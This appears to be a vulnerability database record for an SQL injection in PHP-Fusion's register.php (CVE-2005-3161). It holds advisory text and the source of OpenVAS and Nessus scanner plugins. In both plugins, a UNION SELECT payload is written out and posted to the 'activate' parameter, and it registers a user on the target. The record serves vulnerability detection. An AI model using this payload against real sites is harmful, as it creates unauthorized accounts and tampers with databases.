{"enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3161"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231020009"]}, {"type": "nessus", "idList": ["PHP_FUSION_6_00_110.NASL"]}], "modified": "2017-04-28T13:20:16"}, "vulnersScore": 7.5}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP-Fusion", "operator": "eq", "version": "6.00.109"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:19866", "id": "OSVDB:19866", "title": "PHP-Fusion register.php activate Variable SQL Injection", "history": [], "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:16", "edition": 1, "hash": "bdc5fdcef218d0d722c2bac71086a1fc80babd569ae0f4691c29459f74c92980", "objectVersion": "1.2", "reporter": "Andreas Sandblad(as@secunia.com)", "description": "## Vulnerability Description\nPHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 6.00.110 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.php-fusion.co.uk/\nSecurity Tracker: 1015013\n[Secunia Advisory ID:17055](https://secuniaresearch.flexerasoftware.com/advisories/17055/)\n[Related OSVDB ID: 19867](https://vulners.com/osvdb/OSVDB:19867)\nOther Advisory URL: http://secunia.com/secunia_research/2005-52/advisory/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0130.html\nISS X-Force ID: 22532\n[CVE-2005-3161](https://vulners.com/cve/CVE-2005-3161)\nBugtraq ID: 15018\n", "modified": "2005-10-06T04:45:44", "viewCount": 1, "published": "2005-10-06T04:45:44", "cvelist": ["CVE-2005-3161"], "hashmap": [{"key": "affectedSoftware", "hash": "9048a6a85cdf1383d8d80d57dd431752"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d1dd9b0b6cadcfcc3f7b6f89fe806641"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "99bc16e62c3b2eb16a973c9c69c276b8"}, {"key": "href", "hash": "b9bbe50f454f6f3a646683c59a65a671"}, {"key": "modified", "hash": "5e20594211df0451c757573f4f8f629b"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5e20594211df0451c757573f4f8f629b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4c34e35a4f9c924323262b776e30699c"}, {"key": "title", "hash": "87c691e541b7e0e000311855b469e2da"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}]}

{"cve": [{"lastseen": "2017-07-11T11:15:00", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in PHP-Fusion before 6.00.110 allow remote attackers to execute arbitrary SQL commands via (1) the activate parameter in register.php and (2) the cat_id parameter in faq.php.", "modified": "2017-07-10T21:33:06", "published": "2005-10-06T06:02:00", "id": "CVE-2005-3161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3161", "title": "CVE-2005-3161", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-10-30T12:32:16", "bulletinFamily": "scanner", "description": "The remote version of PHP-Fusion is vulnerable to multiple SQL\n injection attacks due to its failure to properly sanitize certain parameters.", "modified": "2018-10-29T00:00:00", "published": "2006-03-26T00:00:00", "id": "OPENVAS:136141256231020009", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231020009", "title": "PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: php_fusion_6_00_110.nasl 12150 2018-10-29 11:46:42Z cfischer $\n#\n# PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php-fusion:php-fusion\";\n\n# Updated: 04/07/2009\n# Antu Sanadi <santu@secpod.com>\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.20009\");\n script_version(\"$Revision: 12150 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 12:46:42 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2005-3157\", \"CVE-2005-3158\", \"CVE-2005-3160\", \"CVE-2005-3161\");\n script_bugtraq_id(14964, 14992, 15005, 15018);\n script_name(\"PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities\");\n script_category(ACT_MIXED_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"(C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"secpod_php_fusion_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"php-fusion/installed\");\n\n script_xref(name:\"URL\", value:\"http://securityfocus.org/archive/1/411909\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/secunia/2005-q4/0021.html\");\n\n script_tag(name:\"solution\", value:\"Update to at least version 6.00.110 of PHP-Fusion.\");\n\n script_tag(name:\"summary\", value:\"The remote version of PHP-Fusion is vulnerable to multiple SQL\n injection attacks due to its failure to properly sanitize certain parameters.\");\n\n script_tag(name:\"impact\", value:\"Provided PHP's 'magic_quotes_gpc' setting is disabled, these flaws\n allow an attacker to manipulate database queries, which may result in the disclosure or\n modification of data.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) ) exit( 0 );\nver = infos['version'];\ndir = infos['location'];\n\nif( ! safe_checks() ) {\n\n vtstrings = get_vt_strings();\n if( dir == \"/\" ) dir = \"\";\n\n user = rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789_\");\n pass = rand_str();\n email = string(user, \"@\", get_host_name());\n sploit = string(\"UNION SELECT \",'\"\",', '\"\",', '0,',\"'a:4:{\",\n 's:9:\"user_name\";s:', strlen(user), ':\"', user, '\";',\n 's:13:\"user_password\";s:', strlen(pass), ':\"', pass, '\";',\n 's:10:\"user_email\";s:', strlen(email), ':\"', email, '\";',\n 's:15:\"user_hide_email\";s:1:\"1\";',\n \"}\");\n\n postdata = string(\"activate=\", rand_str(), \"'+\", urlencode(str:sploit));\n url = dir + \"/register.php?plugin=\" + vtstrings[\"lowercase\"];\n req = http_post(item:url, port:port, data:postdata);\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n if( !res ) exit( 0 );\n\n if( \"Your account has been verified.\" >< res ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( version_is_less_equal( version:ver, test_version:\"6.00.100\" ) ) {\n report = report_fixed_ver( installed_version:ver, fixed_version:\"6.00.110\" );\n security_message( port:port, data:report );\n}\n\nexit( 0 );", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:49", "bulletinFamily": "scanner", "description": "The remote version of this software is vulnerable to multiple SQL injection attacks due to its failure to properly sanitize certain parameters. Provided PHP's 'magic_quotes_gpc' setting is disabled, these flaws allow an attacker to manipulate database queries, which may result in the disclosure or modification of data.", "modified": "2018-11-15T00:00:00", "id": "PHP_FUSION_6_00_110.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20009", "published": "2005-10-12T00:00:00", "title": "PHP-Fusion < 6.00.110 Multiple Scripts SQL Injection", "type": "nessus", "sourceData": "#\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n# GPLv2\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20009);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2005-3157\",\n \"CVE-2005-3158\",\n \"CVE-2005-3160\",\n \"CVE-2005-3161\"\n );\n script_bugtraq_id(\n 14964,\n 14992,\n 15005,\n 15018\n );\n\n script_name(english:\"PHP-Fusion < 6.00.110 Multiple Scripts SQL Injection\");\n script_summary(english:\"Checks for SQL injection in PHP-Fusion's register.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains several PHP scripts that are vulnerable to\nSQL injection flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of this software is vulnerable to multiple SQL\ninjection attacks due to its failure to properly sanitize certain\nparameters. Provided PHP's 'magic_quotes_gpc' setting is disabled,\nthese flaws allow an attacker to manipulate database queries, which\nmay result in the disclosure or modification of data.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Oct/51\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2005-52/advisory\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to at least version 6.00.110 of PHP-Fusion.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/05\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php_fusion:php_fusion\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"(C) 2005-2018 Josh Zlatin-Amishav\");\n\n script_dependencies(\"php_fusion_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/php_fusion\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_port_state(port)) exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item_or_exit(string(\"www/\", port, \"/php_fusion\"));\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n if (!safe_checks()) {\n # Make sure 'register.php' exists -- it's used in the exploit.\n req = http_get(item:string(dir, \"/register.php\"), port:port);\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n # If it does...\n if (\"<form name='inputform' method='post' action='register.php'\" >< res) {\n # Try to exploit the flaw to register a user.\n user = rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789_\");\n pass = rand_str();\n email = string(user, \"@\", get_host_name());\n sploit = string(\n \"UNION SELECT \",\n '\"\",',\n '\"\",',\n '0,',\n \"'a:4:{\",\n 's:9:\"user_name\";s:', strlen(user), ':\"', user, '\";',\n 's:13:\"user_password\";s:', strlen(pass), ':\"', pass, '\";',\n 's:10:\"user_email\";s:', strlen(email), ':\"', email, '\";',\n 's:15:\"user_hide_email\";s:1:\"1\";',\n \"}\"\n );\n #\n # nb: the code sanitizes GETs so we can't use that.\n postdata = string(\"activate=\", rand_str(), \"'+\", urlencode(str:sploit));\n req = string(\n \"POST \", dir, \"/register.php?plugin=\", SCRIPT_NAME, \" HTTP/1.1\\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if ( \"Your account has been verified.\" >< res)\n {\n if (report_verbosity > 0) {\n report = string(\n \"\\n\",\n \"Nessus has successfully exploited one of the flaws by adding\\n\",\n \"the user '\", user, \"' to PHP-Fusion on the remote host.\\n\"\n );\n security_warning(port:port, extra:report);\n }\n else\n security_warning(port:port);\n\n\tset_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n }\n\n # Check the version number in case registrations are disabled or safe checks are enabled.\n if (ver =~ \"^([0-5][.,]|6[.,]00[.,](0|10[0-9]))\") {\n report =\n\"***** Nessus has determined the vulnerability exists on the remote\n***** host simply by looking at the version number of PHP-Fusion\n***** installed there.\";\n security_warning(port:port, extra:report);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}